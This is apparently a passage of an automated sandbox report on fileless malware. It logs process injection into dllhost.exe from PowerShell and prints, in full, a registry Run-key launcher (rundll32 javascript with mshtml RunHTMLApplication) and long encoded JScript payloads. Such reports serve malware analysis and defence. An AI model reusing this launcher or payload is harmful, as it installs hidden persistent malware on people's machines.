3hVRU1VQUFpMFFrTUw1TkYwQUF1UUFRQUFEenBJUEVETDRFT3dBQVZvbXdBQkFBQU9oLzl2Ly9pVVFrR0kxNEFZb0lRRHJMZGZscUJDdkhhQUF3QUFDTnVIMEhBQUJYVS84VmVEQkFBRmVOakNSVUJBQUFVVkNKUkNRWS94VUVNVUFBZzhRTS8zUWtHR2c0TzBBQVYvOTBKQmpveFB6Ly8yb0tqWVFrUkFFQUFGQlcveFg4TUVBQWc4UU1qWVFrUUFFQUFGQm9TRHRBQUZmL2RDUVk2Sm44Ly8rTFJDUU1qWEFCaWdoQU9zdDEr True 2
Set Environment String name = PSMODULEPATH, value = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Process #4: dllhost.exe
(Host: 120, Network: 3)
Information Value
ID #4
File Name c:\windows\syswow64\dllhost.exe
Command Line C:\Windows\syswow64\dllhost.exe
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:47, Reason: Child Process
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:01:25
OS Process Information
Information Value
PID 0xa94
Parent PID 0xa58 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010611 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xa98
0xa9c
0xaa0
0xaa4
0xaac
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
private_0x0000000000060000 0x00060000 0x00063fff Private Memory Readable, Writable, Executable True True False
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False
private_0x00000000000e0000 0x000e0000 0x0011ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True True False
windowsshell.manifest 0x00130000 0x00130fff Memory Mapped File Readable False False False
pagefile_0x0000000000130000 0x00130000 0x00130fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable True False False
index.dat 0x00150000 0x0015bfff Memory Mapped File Readable, Writable True False False
index.dat 0x00160000 0x00167fff Memory Mapped File Readable, Writable True False False
index.dat 0x00170000 0x0017ffff Memory Mapped File Readable, Writable True False False
dllhost.exe 0x00190000 0x00194fff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000001a0000 0x001a0000 0x0026ffff Private Memory Readable, Writable True True False
private_0x00000000001a0000 0x001a0000 0x0020ffff Private Memory Readable, Writable True True False
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True True False
private_0x0000000000270000 0x00270000 0x002affff Private Memory Readable, Writable True True False
private_0x0000000000270000 0x00270000 0x0034ffff Private Memory Readable, Writable True True False
private_0x00000000002b0000 0x002b0000 0x002effff Private Memory Readable, Writable True True False
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory Readable, Writable True True False
private_0x0000000000350000 0x00350000 0x0039ffff Private Memory Readable, Writable True True False
private_0x0000000000370000 0x00370000 0x003affff Private Memory Readable, Writable True True False
private_0x00000000003c0000 0x003c0000 0x003fffff Private Memory Readable, Writable True True False
private_0x0000000000410000 0x00410000 0x0048ffff Private Memory Readable, Writable True True False
private_0x0000000000490000 0x00490000 0x004cffff Private Memory Readable, Writable True True False
pagefile_0x00000000004d0000 0x004d0000 0x005aefff Pagefile Backed Memory Readable True False False
private_0x00000000005f0000 0x005f0000 0x006effff Private Memory Readable, Writable True True False
pagefile_0x00000000006f0000 0x006f0000 0x00877fff Pagefile Backed Memory Readable True False False
private_0x00000000008c0000 0x008c0000 0x008cffff Private Memory Readable, Writable True True False
pagefile_0x00000000008d0000 0x008d0000 0x00a50fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a60000 0x00a60000 0x01e5ffff Pagefile Backed Memory Readable True False False
private_0x0000000001e60000 0x01e60000 0x0418cfff Private Memory Readable, Writable, Executable True False False
sortdefault.nls 0x04190000 0x0445efff Memory Mapped File Readable False False False
private_0x0000000004490000 0x04490000 0x044cffff Private Memory Readable, Writable True True False
private_0x00000000044e0000 0x044e0000 0x0451ffff Private Memory Readable, Writable True True False
private_0x00000000045e0000 0x045e0000 0x0461ffff Private Memory Readable, Writable True True False
private_0x0000000004620000 0x04620000 0x047affff Private Memory Readable, Writable True True False
private_0x0000000004660000 0x04660000 0x0469ffff Private Memory Readable, Writable True True False
private_0x0000000004770000 0x04770000 0x047affff Private Memory Readable, Writable True True False
private_0x00000000047b0000 0x047b0000 0x049affff Private Memory Readable, Writable True True False
private_0x00000000049b0000 0x049b0000 0x04baffff Private Memory Readable, Writable True True False
uxtheme.dll 0x738b0000 0x7392ffff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x73a70000 0x73acbfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x73ad0000 0x73b0efff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x73b40000 0x73b47fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74a50000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x74c60000 0x74c65fff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x74c70000 0x74ca7fff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x74cb0000 0x74cb7fff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x74cc0000 0x74cd1fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x74ce0000 0x74ceffff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x74cf0000 0x74cfffff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x74d00000 0x74d04fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x74d10000 0x74d4bfff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x74d50000 0x74d56fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x74d60000 0x74d7bfff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x74d80000 0x74dc3fff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x74e00000 0x74e0afff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x74e10000 0x74fadfff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x750b0000 0x750bbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x750c0000 0x7511ffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75120000 0x7521ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x75240000 0x75258fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x75260000 0x7530bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75320000 0x75365fff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x75380000 0x753b4fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x753c0000 0x754affff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x754e0000 0x7556ffff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75570000 0x756cbfff Memory Mapped File Readable, Writable, Executable False False False
imagehlp.dll 0x75760000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75790000 0x763d9fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x763e0000 0x7646efff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76470000 0x765a5fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x765b0000 0x766bffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76750000 0x76759fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x76760000 0x767fffff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x768e0000 0x769fcfff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76a00000 0x76acbfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x76ad0000 0x76b2ffff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76b30000 0x76bccfff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x76bd0000 0x76bd5fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x76be0000 0x76cd4fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76d30000 0x76f2afff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x77100000 0x77156fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000077160000 0x77160000 0x77259fff Private Memory Readable, Writable, Executable True True False
private_0x0000000077260000 0x77260000 0x7737efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77380000 0x77528fff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x77530000 0x7753bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77560000 0x776dffff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
Injection Type Source Process Source Os Thread ID Injection Info Success Count
Modify Memory #3: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe 0xa88 address = 0x60000, size = 15108 True 1
Modify Control Flow #3: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe 0xa88 os_tid = 0xa98, address = 0x60000 True 1
Host Behavior
Registry (12)
Operation Key Additional Information Success Count
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 3
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ True 1
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 1
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 1
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = 35 True 1
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ value_name = s, data = 0 False 1
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>"), size = 464, type = REG_SZ True 1
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 
5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. 
}CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA, size = 61268, type = REG_SZ True 1
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>"), size = 464, type = REG_SZ True 1
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 
5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. 